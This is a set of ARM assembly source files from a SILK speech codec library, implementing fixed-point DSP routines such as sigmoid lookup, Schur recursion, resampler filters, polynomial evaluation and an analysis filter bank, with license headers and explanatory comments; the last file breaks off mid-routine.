VARDEF val_slope, r5
VARDEF val_PUT, r4
VARDEF in_Q5_tmp, r3
/*
 * SKP_Silk_sigm_Q15 -- sigmoid approximation by table lookup with linear
 * interpolation between entries.
 * In:  r0 = input in Q5
 * Out: r0 = sigmoid value in Q15
 * Negative inputs are mirrored (|in|) and use the second half of the table
 * (byte offset +24); |in| >= 192 (6.0 in Q5) returns the saturated value
 * directly (32767 for positive input, 0 for negative).
 */
.globl SYM(SKP_Silk_sigm_Q15)
SYM(SKP_Silk_sigm_Q15):
stmdb sp!, {r4-r7, fp, ip, lr}
add fp, sp, #24
cmp r0, #0
ldr ptr_slope, TABLE(L0, =SKP_Silk_sigm_tab)
mov in_Q5, r0
rsblt in_Q5, r0, #0 // in_Q5 = |input|
mov r0, #32768
addlt ptr_slope, ptr_slope, #24 // negative input: slope/LUT rows 2-3
movlt r0, #1
add ptr_LUT, ptr_slope, #12 /*sigm_LUT_pos_Q15*/
cmp in_Q5, #192 /*6*32*/
sub r0, r0, #1 // saturated result: 32767 (pos) or 0 (neg)
bge LR(1, f) // out of table range: return it as-is
mov ind, in_Q5, asr #5 /*ind*/
mov ind, ind, lsl #1 // halfword offset into both tables
and in_Q5_tmp, in_Q5, #0x1F // fractional part, 0..31
ldrsh val_slope, [ptr_slope, ind] /*sigm_LUT_slope_Q10*/
ldrsh val_PUT, [ptr_LUT, ind] /*sigm_LUT_pos/neg_Q15*/
mla r0, val_slope, in_Q5_tmp, val_PUT // result = LUT + slope * frac
L(1)
ldmia sp!, {r4-r7, fp, ip, pc}
L(L0)
DCD SYM(SKP_Silk_sigm_tab)
/* Four rows of six halfwords: slopes (positive side), LUT (positive side),
 * slopes (negative side), LUT (negative side). */
SKP_TABLE SKP_Silk_sigm_tab, 2
DCW 237, 153, 73, 30, 12, 7, \
16384, 23955, 28861, 31213, 32178, 32548, \
-237, -153, -73, -30, -12, -7, \
16384, 8812, 3906, 1554, 589, 219
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 5,346 | silk/src/SKP_Silk_schur64_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=6
/* Register aliases; several names deliberately share a register and are live
 * in different phases of the routine (e.g. val_C0 / ptr_C1 both map to r7). */
VARDEF ptr_rc, r4
VARDEF ptr_C0, r3
VARDEF val_C0, _r7
VARDEF ptr_C1, _r7
VARDEF val_a32, r0
VARDEF val_b32, r1
VARDEF val_a32_tmp, r2
VARDEF val_b32_tmp, r3
VARDEF a_headrm, r0
VARDEF b_headrm, r1
VARDEF a32_nrm, r5
VARDEF b32_nrm, sl
VARDEF headrm_tmp, r8
VARDEF result, r1
VARDEF tmp0, r2
VARDEF lshift, r3
VARDEF rc_tmp_Q31, r0
VARDEF tmp1, r1
VARDEF val_rc, r2
VARDEF ptr_C2, r8
VARDEF ptr_C3, sb
VARDEF val_C2, r1
VARDEF val_C3, r2
VARDEF out_C2, r5
VARDEF out_C3, sl
VARDEF order1, r6
VARDEF order2, r3
EXTERN SYM(SKP_DIV32_arm)
.set sp_ptr_C, 0
/*
 * SKP_Silk_schur64 -- Schur recursion: convert autocorrelations into
 * reflection coefficients (Q16), one per outer-loop iteration.
 * In:  r0 = rc_Q16 (out), r1 = c (autocorrelation input), r2 = order
 * Out: r0 = residual energy C[0][1]
 * Uses a 136-byte stack buffer as the C[order+1][2] working array
 * (sized for order <= 16). Calls SKP_DIV32_arm for the division.
 * NOTE(review): roles inferred from the code -- confirm against the C
 * declaration of SKP_Silk_schur64.
 */
.globl SYM(SKP_Silk_schur64)
SYM(SKP_Silk_schur64):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #136
mov ptr_rc, r0 /*rc_Q16*/
mov order1, r2 /*order*/
mov ptr_C0, sp
ldr val_C0, [r1], #4
/* Copy each input correlation into both columns of C[k][]. */
L(0)
subs r2, r2, #1
str val_C0, [ptr_C0], #4
str val_C0, [ptr_C0], #4
ldr val_C0, [r1], #4
bgt LR(0, b)
str val_C0, [ptr_C0], #4
str val_C0, [ptr_C0], #4
add ptr_C1, sp, #8
/* Outer loop: one reflection coefficient per pass. */
L(1)
ldr val_a32, [ptr_C1], #8
ldr val_b32, [sp, #4]
rsb val_a32, val_a32, #0 /*-C[k + 1][0]*/
mov val_a32_tmp, val_a32 /*a32*/
mov val_b32_tmp, val_b32 /*b32*/
/* Normalize numerator and denominator to one bit of headroom each
 * (clz of |value| minus 1). */
cmp val_a32, #0
rsblt val_a32, val_a32_tmp, #0 /*a_headrm*/
clz a_headrm, val_a32
cmp val_b32, #0
rsblt val_b32, val_b32_tmp, #0 /*b_headrm*/
clz b_headrm, val_b32
sub a_headrm, a_headrm, #1
sub b_headrm, b_headrm, #1
mov a32_nrm, val_a32_tmp, lsl a_headrm /*a32_nrm*/
mov b32_nrm, val_b32_tmp, lsl b_headrm /*b32_nrm*/
sub headrm_tmp, a_headrm, b_headrm /*a_headrm - b_headrm*/
mvn r0, #0x80000000 /*r0 = 0x7FFF FFFF*/
mov r1, b32_nrm, asr #16 /*SKP_RSHIFT(b32_nrm, 16)*/
mov r0, r0, asr #2
// registers need to preserve: ptr_rc (r4)
// a32_nrm (r5)
// order1 (r6)
// ptr_C1 (r7)
// headrm_tmp (r8)
// b32_nrm (sl)
bl SYM(SKP_DIV32_arm) // r0 = approximate reciprocal of b32 (b32_inv)
/* Refine a32/b32 with one correction step using the approximate inverse. */
smulwb result, a32_nrm, r0 /*result = SKP_SMULWB(a32_nrm, b32_inv);*/
smmul tmp0, b32_nrm, result /*SKP_SMMUL(b32_nrm, result)*/
sub a32_nrm, a32_nrm, tmp0, lsl #3 /*a32_nrm -= SKP_LSHIFT_ovflw( SKP_SMMUL(b32_nrm, result), 3 );*/
smlawb result, a32_nrm, r0, result /*result = SKP_SMLAWB(result, a32_nrm, b32_inv);*/
subs lshift, headrm_tmp, #2 /*lshift= 29 + a_headrm - b_headrm - Qres;*/
rsble lshift, lshift, #0
#ifdef _WINRT
bgt LR(3, f)
mov rc_tmp_Q31, result, lsl lshift
b LR(4, f)
L(3)
mov rc_tmp_Q31, result, asr lshift
L(4)
#else
movle rc_tmp_Q31, result, lsl lshift // apply the residual normalization shift
movgt rc_tmp_Q31, result, asr lshift
#endif
mov tmp1, rc_tmp_Q31, asr #14 /*SKP_RSHIFT_ROUND( rc_tmp_Q31, 15 )*/
add val_rc, tmp1, #1
mov val_rc, val_rc, asr #1
str val_rc, [ptr_rc], #4 // store rc_Q16[k]
mov order2, order1 /*order-k*/
sub ptr_C2, ptr_C1, #8 /*r8 = &C[k+1][0]*/
add ptr_C3, sp, #4 /*sb = &C[0][1]*/
/* Update the remaining rows of C with the new coefficient:
 * new0 = old1 + 2 * SMMUL(old0, rc), and symmetrically. */
L(2)
ldr val_C2, [ptr_C2]
ldr val_C3, [ptr_C3]
subs order2, order2, #1
mov out_C2, val_C2, lsl #1
mov out_C3, val_C3, lsl #1
smmul out_C2, out_C2, rc_tmp_Q31
smmul out_C3, out_C3, rc_tmp_Q31
add out_C2, out_C2, val_C3
add out_C3, out_C3, val_C2
str out_C2, [ptr_C3], #8
str out_C3, [ptr_C2], #8
bgt LR(2, b)
subs order1, order1, #1
bgt LR(1, b)
ldr r0, [sp, #4] /*r0 = C[0][1]*/
add sp, sp, #136
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 2,632 | silk/src/SKP_Silk_resampler_private_AR2_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
VARDEF len, r4
VARDEF S_0, r5
VARDEF S_1, r6
VARDEF in0, _r7
VARDEF out32, r8
VARDEF A_Q140, sb
VARDEF A_Q141, sl
.set sp_S, 0
/*
 * SKP_Silk_resampler_private_AR2 -- second-order AR filter.
 * In:  r0 = S      state vector, two SKP_int32 (loaded; written back at exit)
 *      r1 = out    output buffer, SKP_int32 in Q8
 *      r2 = in     input buffer, SKP_int16
 *      r3 = A_Q14  two SKP_int16 AR coefficients in Q14
 *      5th argument (len) on the caller's stack at sp+44
 *      (4 bytes of locals + 40 bytes of saved registers).
 * If len == 0 the routine returns without touching S or out.
 * NOTE(review): roles inferred from the code -- confirm against the C
 * declaration of SKP_Silk_resampler_private_AR2.
 */
.globl SYM(SKP_Silk_resampler_private_AR2)
SYM(SKP_Silk_resampler_private_AR2):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #4
.set sp_len, 44
str r0, [sp, #sp_S]
ldr S_0, [r0], #4
ldr S_1, [r0], #-4 // r0 back at &S[0] for the write-back below
ldr len, [sp, #sp_len]
ldrsh A_Q140, [r3], #2
ldrsh A_Q141, [r3]
cmp len, #0
beq LR(1, f) // nothing to do
L(0)
ldrsh in0, [r2], #2
add out32, S_0, in0, lsl #8 // out = S[0] + (in << 8), Q8
str out32, [r1], #4
subs len, len, #1
mov out32, out32, lsl #2 // scale up before the Q14 smlawb/smulwb
smlawb S_0, out32, A_Q140, S_1 // S[0] = S[1] + ((out<<2) * A[0]) >> 16
smulwb S_1, out32, A_Q141 // S[1] = ((out<<2) * A[1]) >> 16
bgt LR(0, b)
str S_0, [r0], #4 // write the updated state back
str S_1, [r0]
L(1)
add sp, sp, #4
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 3,613 | silk/src/SKP_Silk_resampler_private_ARMA4_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
VARDEF len, r0
VARDEF S_0, r3
VARDEF S_1, r4
VARDEF S_2, r5
VARDEF S_3, r6
VARDEF in, _r7
VARDEF out1, r8
VARDEF coef01, sb
VARDEF coef23, sl
VARDEF coef45, ip
VARDEF coef6, r8 // shares r8 with out1; spilled to the stack before the loop
VARDEF coef_tmp, _r7
VARDEF out2, lr
.set sp_S, 0
.set sp_coef, 4
/*
 * SKP_Silk_resampler_private_ARMA4 -- 4th-order ARMA filter.
 * In:  r0 = S     state vector, four SKP_int32 (loaded; written back at exit)
 *      r1 = out   output buffer, SKP_int16
 *      r2 = in    input buffer, SKP_int16
 *      r3 = Coef  seven SKP_int16 coefficients; pairs are packed two per
 *                 register (low/high halfwords, used via smlawb/smlawt)
 *      5th argument (len) on the caller's stack at sp+48
 *      (8 bytes of locals + 40 bytes of saved registers).
 * If len == 0 the routine returns without touching S or out.
 * NOTE(review): roles inferred from the code -- confirm against the C
 * declaration of SKP_Silk_resampler_private_ARMA4.
 */
.globl SYM(SKP_Silk_resampler_private_ARMA4)
SYM(SKP_Silk_resampler_private_ARMA4):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #8
.set sp_len, 48
ldr lr, [sp, #sp_len]
/* Load the 7 coefficients; the odd-indexed ones sit in S_1..S_3 only until
 * they are packed into the high halfwords of coef01/coef23/coef45 below. */
ldrh coef01, [r3], #2
ldrh S_1, [r3], #2
ldrh coef23, [r3], #2
ldrh S_2, [r3], #2
ldrh coef45, [r3], #2
ldrh S_3, [r3], #2
ldrh coef6, [r3], #2
cmp lr, #0
str r0, [sp, #sp_S] // keep &S for the write-back
beq LR(1, f) // if len==0
str coef6, [sp, #sp_coef] // spill coef6: r8 becomes out1 in the loop
ldrsh in, [r2], #2
add coef01, coef01, S_1, lsl #16
add coef23, coef23, S_2, lsl #16
add coef45, coef45, S_3, lsl #16
ldmia r0, {S_0, S_1, S_2, S_3} // now load the real filter state
mov len, lr
L(0)
mov in, in, lsl #8 // input in Q8
add out1, in, S_0, lsl #2 // out1 = in_Q8 + (S[0] << 2)
add out2, out1, S_2, lsl #2 // out2 = out1 + (S[2] << 2)
smlawb S_0, in, coef01, S_1
smlawb S_0, out1, coef23, S_0
smlawt S_2, out1, coef01, S_3
smlawb S_2, out2, coef45, S_2
smulwt S_1, out1, coef23
smulwt S_3, out2, coef45
add S_1, S_1, in, asr #2
ldr coef_tmp, [sp, #sp_coef] // reload the spilled coef6
add S_3, S_3, out1, asr #2
mov out1, #128 // rounding offset for the >> 8
smlawb out1, out2, coef_tmp, out1
#if EMBEDDED_ARM<6
/* Pre-ARMv6: manual clamp to [-2^23, 2^23 - 1] so that >> 8 lands in
 * int16 range (equivalent of the ssat below). */
cmp out1, #0x800000
movge out1, #0x800000
subge out1, out1, #1
cmn out1, #0x800000
movlt out1, #0x800000
mov out1, out1, asr #8
#else
ssat out1, #16, out1, asr #8 // >> 8 and saturate to int16
#endif
subs len, len, #1
strh out1, [r1], #2
#ifdef _WINRT
ble LR(1, f) // _WINRT build avoids conditionally executed loads
ldrsh in, [r2], #2
b LR(0, b)
L(1)
#else
ldrgtsh in, [r2], #2 // preload next sample while samples remain
bgt LR(0, b)
#endif
ldr r0, [sp, #sp_S]
stmia r0, {S_0, S_1, S_2, S_3} // write the updated state back
L(1)
add sp, sp, #8
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 2,964 | silk/src/SKP_Silk_A2NLSF_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=6
VARDEF y32, r3
VARDEF pn1, r4
VARDEF pn2, r5
VARDEF lo, r6
VARDEF hi, r8
/*
 * SKP_Silk_A2NLSF_eval_poly -- evaluate a polynomial by Horner's rule.
 * In:  r0 = p   coefficient array (SKP_int32); p[dd] is the leading term
 *      r1 = x   evaluation point (multiplied by 16 below)
 *      r2 = dd  polynomial order
 * Out: r0 = y(x)
 * Each step computes y = p[i] + ((y * (x << 4)) >> 16) with a 32x32->64
 * multiply: smull gives {lo, hi}; (hi << 16) | (lo >> 16) is the >> 16.
 * Odd and even orders take separate paths so the even path can fetch two
 * coefficients per ldmdb and unroll two Horner steps per iteration.
 */
.globl SYM(SKP_Silk_A2NLSF_eval_poly)
SYM(SKP_Silk_A2NLSF_eval_poly):
stmdb sp!, {r4-r8, fp, ip, lr}
add fp, sp, #28
add r0, r0, r2, lsl #2 // r0 = &p[dd]
ldr y32, [r0], #-4 // y = p[dd]; walk the coefficients downwards
tst r2, #1
beq LR(1, f) // even order: unrolled path below
ldr pn1, [r0], #-4
sub r2, r2, #1
mov r1, r1, lsl #4 // x scaled once, outside the loop
L(0)
smull lo, hi, y32, r1 // {lo, hi} = y * x (64-bit)
subs r2, r2, #1
add y32, pn1, hi, lsl #16 // y = p[i] + ((y * x) >> 16) ...
ldr pn1, [r0], #-4
add y32, y32, lo, lsr #16 // ... low half of the shifted product
bgt LR(0, b)
smull lo, hi, y32, r1 // final Horner step
add y32, pn1, hi, lsl #16
add r0, y32, lo, lsr #16 // return value
ldmia sp!, {r4-r8, fp, ip, pc}
L(1)/*EVEN:*/
add r0, r0, #4
ldmdb r0!, {pn1, pn2} // fetch two coefficients at once
sub r2, r2, #2
mov r1, r1, lsl #4 // x scaled once, outside the loop
L(0)
smull lo, hi, y32, r1 // two Horner steps per iteration
subs r2, r2, #2
add y32, pn2, hi, lsl #16
add y32, y32, lo, lsr #16
smull lo, hi, y32, r1
add y32, pn1, hi, lsl #16
ldmdb r0!, {pn1, pn2}
add y32, y32, lo, lsr #16
bgt LR(0, b)
smull lo, hi, y32, r1 // final two steps
add y32, pn2, hi, lsl #16
add y32, y32, lo, lsr #16
smull lo, hi, y32, r1
add y32, pn1, hi, lsl #16
add r0, y32, lo, lsr #16 // return value
ldmia sp!, {r4-r8, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 5,894 | silk/src/SKP_Silk_ana_filt_bank_1_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
/*
 * void SKP_Silk_ana_filt_bank_1(
 * const SKP_int16 *in, I: Input signal [N]
 * SKP_int32 *S, I/O: State vector [2]
 * SKP_int16 *outL, O: Low band [N/2]
 * SKP_int16 *outH, O: High band [N/2]
 * SKP_int32 *scratch, I: Scratch memory [3*N/2]
 * const SKP_int32 N I: Number of input samples
 * )
 *
 * Splits the input into low/high bands: even and odd samples are
 * de-interleaved (shifted up by 10) into two scratch regions, each is run
 * through SKP_Silk_allpass_int, and the two branch outputs are summed /
 * differenced, rounded, shifted down by 11 and saturated to int16.
 * 5th/6th C arguments (scratch, N) are read from the caller's stack at
 * sp+52 / sp+56 (12 bytes of locals + 40 bytes of saved registers).
 */
VARDEF ptr_in_lo, r0
VARDEF ptr_in_hi, r3
VARDEF val_in_lo, sb
VARDEF val_in_hi, sl
VARDEF ptr_scratch, r4
VARDEF ptr_scratch_N, r1
VARDEF ptr_scratch_halfN, r2
VARDEF idx_k, ip
VARDEF val_N, r8
VARDEF val_halfN, r8
VARDEF val_scratch1, r5
VARDEF val_scratch2, r6
VARDEF ptr_out_lo, r5
VARDEF ptr_out_hi, r6
VARDEF ptr_s, _r7
VARDEF val_const1, r2
VARDEF val_const2, ip // 0x03FF F800
VARDEF val_const3, sl // 0x0000 7FFF
VARDEF val_const4, lr // 0xFFFF 8000
VARDEF idx_k2, r8
VARDEF ptr_scratch_halfN_2, r3
VARDEF val_scratch3, r0
VARDEF val_scratch4, r1
VARDEF out_tmpla, sb
VARDEF out_tmplb, r2
VARDEF out_tmpha, r0
VARDEF out_tmphb, _r7
.set halfN, 0
.set sp_ptr_out_lo, 4
.set sp_ptr_out_hi, 8
EXTERN SYM(SKP_Silk_allpass_int)
.globl SYM(SKP_Silk_ana_filt_bank_1)
SYM(SKP_Silk_ana_filt_bank_1):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #12
.set arg_scratch, 52
.set arg_N, 56
ldr ptr_scratch, [sp, #arg_scratch] // 5th C argument (stack)
ldr val_N, [sp, #arg_N] // 6th C argument (stack)
str r2, [sp, #sp_ptr_out_lo] // outL, needed after the bl calls
str r3, [sp, #sp_ptr_out_hi] // outH, needed after the bl calls
mov ptr_s, r1
mov val_halfN, val_N, asr #1
sub idx_k, val_halfN, #1
add ptr_in_hi, ptr_in_lo, #2 // odd samples start one halfword in
str val_halfN, [sp, #halfN]
ldrsh val_in_lo, [ptr_in_lo], #4 // even samples: stride 2 halfwords
ldrsh val_in_hi, [ptr_in_hi], #4 // odd samples: stride 2 halfwords
add ptr_scratch_N, ptr_scratch, val_halfN, lsl #3 // &scratch[N]
add ptr_scratch_halfN, ptr_scratch, val_halfN, lsl #2 // &scratch[N/2]
/* De-interleave: even samples << 10 into scratch[N..], odd samples << 10
 * into scratch[N/2..]. */
L(0)
mov val_scratch1, val_in_lo, lsl #10
mov val_scratch2, val_in_hi, lsl #10
ldrsh val_in_lo, [ptr_in_lo], #4
ldrsh val_in_hi, [ptr_in_hi], #4
subs idx_k, idx_k, #1
str val_scratch1, [ptr_scratch_N], #4
str val_scratch2, [ptr_scratch_halfN], #4
bgt LR(0, b)
mov val_scratch1, val_in_lo, lsl #10 // last pair (loaded beyond the loop)
mov val_scratch2, val_in_hi, lsl #10
str val_scratch1, [ptr_scratch_N], #4
str val_scratch2, [ptr_scratch_halfN], #4
/* First allpass branch: coefficient 0x1512, state S[1],
 * in = scratch[N/2..], out = scratch[0..]. */
mov val_const1, #0x1500
add r0, ptr_scratch, val_halfN, lsl #2
add r1, ptr_s, #4
add val_const1, val_const1, #0x12 // val_const1 = 0x1512
mov r3, ptr_scratch
bl SYM(SKP_Silk_allpass_int)
/* Second allpass branch: coefficient 0x508F, state S[0],
 * in = scratch[N..], out = scratch[N/2..]. */
mov val_const1, #0x5000
add r0, ptr_scratch, val_halfN, lsl #3
mov r1, ptr_s
add val_const1, val_const1, #0x8F // val_const1 = 0x508F
add r3, ptr_scratch, val_halfN, lsl #2
bl SYM(SKP_Silk_allpass_int)
/* Combine stage constants: val_const3 = 0x7FFF, val_const4 = -0x7FFF,
 * val_const2 = 0x7FFF << 11 (saturation threshold before the >> 11). */
mvn val_const2, #0x80000000
add ptr_scratch_halfN_2, ptr_scratch, val_halfN, lsl #2
mov val_const3, val_const2, asr #16
rsb val_const4, val_const3, #0
mov idx_k2, val_halfN
mov val_const2, val_const3, lsl #11
ldr ptr_out_lo, [sp, #sp_ptr_out_lo]
ldr ptr_out_hi, [sp, #sp_ptr_out_hi]
/* Low band = (branch0 + branch1 + 1024) >> 11, high band uses the
 * difference; both saturated to int16 by the conditional stores below. */
L(1)
ldr val_scratch3, [ptr_scratch], #4
ldr val_scratch4, [ptr_scratch_halfN_2], #4
add out_tmpla, val_scratch3, val_scratch4
sub out_tmpha, val_scratch3, val_scratch4
add out_tmplb, out_tmpla, #1024 // rounding offset
add out_tmphb, out_tmpha, #1024
mov out_tmplb, out_tmplb, asr #11
mov out_tmphb, out_tmphb, asr #11
strh out_tmplb, [ptr_out_lo], #2
strh out_tmphb, [ptr_out_hi], #2
/* Overwrite the just-stored halfword with +/-0x7FFF when the pre-shift
 * sum/difference exceeded the threshold. */
#ifdef _WINRT
cmp out_tmpla, val_const2
ble LR(2, f)
strh val_const3, [ptr_out_lo, #-2]
L(2)
cmn out_tmpla, val_const2
bge LR(2, f)
strh val_const4, [ptr_out_lo, #-2]
L(2)
cmp out_tmpha, val_const2
ble LR(2, f)
strh val_const3, [ptr_out_hi, #-2]
L(2)
cmn out_tmpha, val_const2
bge LR(2, f)
